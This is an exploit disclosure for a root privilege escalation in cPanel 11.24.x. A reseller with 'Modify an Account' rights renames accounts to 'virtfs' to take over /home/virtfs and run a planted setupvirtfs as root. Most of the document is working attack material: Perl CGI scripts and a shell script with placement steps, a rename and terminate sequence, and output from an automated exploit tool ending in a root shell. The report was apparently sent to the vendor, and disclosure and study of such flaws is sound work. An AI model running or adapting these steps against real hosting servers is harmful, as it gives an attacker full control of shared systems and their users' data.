cPanel 11.24.7-BETA_35691 - owning virtfs



DESCRIPTION


Resellers with edit-account privileges can execute commands as root. What follows is a slightly edited version of the email cPanel was sent about this issue.


VERSIONS TESTED
11.24.7-BETA_35691
11.24.4-STABLE_35075
CentOS release 5.3 (Final)


REQUIREMENTS

A reseller account with the "Modify an Account" feature enabled.


PROBLEM

Resellers that have access to the "Modify an Account" feature in WHM can rename one of their accounts to the username "virtfs" (without the quotes). This will ultimately allow the reseller to obtain full, unrestricted root access to a box.


PREFACE

This vulnerability requires the reseller to control the "/home/virtfs" directory. Some hosts will have the /home/virtfs directory set up already, and some will not. The ones that do probably offer jailshell access, since the execution of /usr/local/cpanel/bin/jailshell is normally what creates the /home/virtfs directory, which is user:group root:root, 0700:

[root@host ~]# ls -ld /home/virtfs
drwx------  8 root     root     4096 Apr 29 22:53 /home/virtfs


Note that it does not matter if the directory exists or not in order to pull off this attack. If it doesn't exist, the reseller can create it. If it does exist, the reseller can destroy it and recreate it themselves.

This demonstration will assume that it already exists, for no other reason than the fact that I think it makes things a little more interesting/entertaining. Note that this demonstration also does not require logging into the shell at any time. We will be doing this entirely via the web browser in order to fully demonstrate the seriousness of this issue.


STEP 0 - set up /home/virtfs

If you're testing this yourself based on the instructions below, make sure you set up the /home/virtfs directory (log into an account via ssh that has jailshell access, or use a cgi script via your web browser to execute the jailshell binary, etc). Or, just use mkdir and chmod.


STEP 1 - create the reseller account

Create a reseller account (we'll use the userame "reseller"), and allow it access to the "Modify an Account" feature in WHM.


STEP 2 - set up the reseller's cpanel3-skel/ dir:


[ 1 of 3 ] Place this script called "user1.pl" in /home/reseller/cpanel3-skel/public_html/cgi-bin/ and make sure it has permissions of 0755:

#!/usr/bin/perl
print "Content-type: text/plain\r\n\r\n";
system("mkdir -p /home/user1/user2/usr/local/cpanel/bin");
system("echo '/usr/bin/id > /home/user1/id.out' > /home/user1/user2/usr/local/cpanel/bin/setupvirtfs");
chmod 0755, '/home/user1/user2/usr/local/cpanel/bin/setupvirtfs';


[ 2 of 3 ] Place this script called "user2.pl" in /home/reseller/cpanel3-skel/public_html/cgi-bin/ and make sure it has permissions of 0755:

#!/usr/bin/perl
print "Content-type: text/plain\r\n\r\n";
chdir '/home/user2';
system("ln /usr/local/cpanel/bin/jailshell");
system("/home/user2/jailshell /home/user2/jailshell.sh");


[ 3 of 3 ] Place this script called "jailshell.sh" in /home/reseller/cpanel3-skel/ and make sure it has permissions of 0755:

#!/bin/sh
/home/user2/jailshell


STEP 3 - create 2 new accounts

1. As the reseller "reseller", create 2 new user accounts called "user1" and "user2".

Verify that the following files exist:

+ /home/user1/public_html/cgi-bin/user1.pl
/home/user1/public_html/cgi-bin/user2.pl
/home/user1/jailshell.sh

/home/user2/public_html/cgi-bin/user1.pl
+ /home/user2/public_html/cgi-bin/user2.pl
+ /home/user2/jailshell.sh

NOTE: only the files on the lines starting with a "+" are going to actually be used.


STEP 4 - remove and recreate /home/virtfs

As the reseller "reseller",

A. use the "Modify an Account" option to rename "user1" to "virtfs".

B. use the "Modify an Account" option to rename "virtfs" to "user1".

* Now there is no more /home/virtfs :-)

C. terminate the "user1" account.

D. recreate the "user1" account.


STEP 5 - execute user1.pl

Browse to the following URL:

http://x.x.x.x/~user1/cgi-bin/user1.pl


STEP 6 - rename user1 to virtfs

As the reseller "reseller", use the "Modify an Account" feature in WHM to rename the "user1" account to "virtfs".


STEP 7 - execute user2.pl

Browse to the following URL:

http://x.x.x.x/~user2/cgi-bin/user2.pl


* Now check the id.out file we created:

[user@host ~]$ cat /home/user1/id.out
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)



IMPACT


Full system compromise.


[user@host ~]$ ./11.24.4-EDGE_35784-virtfsown.pl
[+] Modify an Account (edit-account) privileges verified
[+] Creating /home/user/cpanel3-skel/public_html/cgi-bin/user1.pl
[+] Creating /home/user/cpanel3-skel/public_html/cgi-bin/user2.pl
[+] Creating /home/user/cpanel3-skel/user2.sh
[+] Creating /tmp/shell.c
[+] Compiling the shell and removing the source
[+] Creating /home/user/setupvirtfs.c
[+] Compiling /home/user/setupvirtfs.c
[+] Account user1 (qktiavbn.com) created
[+] Account user2 (wrkmhdpq.com) created
[?] /home/virtfs or /checkvirtfs exists. Safely removing /home/virtfs
[+] Renaming user1 to virtfs
[+] Renaming virtfs to user1
[?] /home/virtfs no longer exists
[+] Account user1 terminated
[+] Account user1 (zuamufgv.com) created
[+] URL 1: Creating the directory structure and setting up setupvirtfs
[+] Renaming user1 to virtfs
[+] URL 2: Calling the jailshell scripts
[root@host /]# id
uid=0(root) gid=0(root)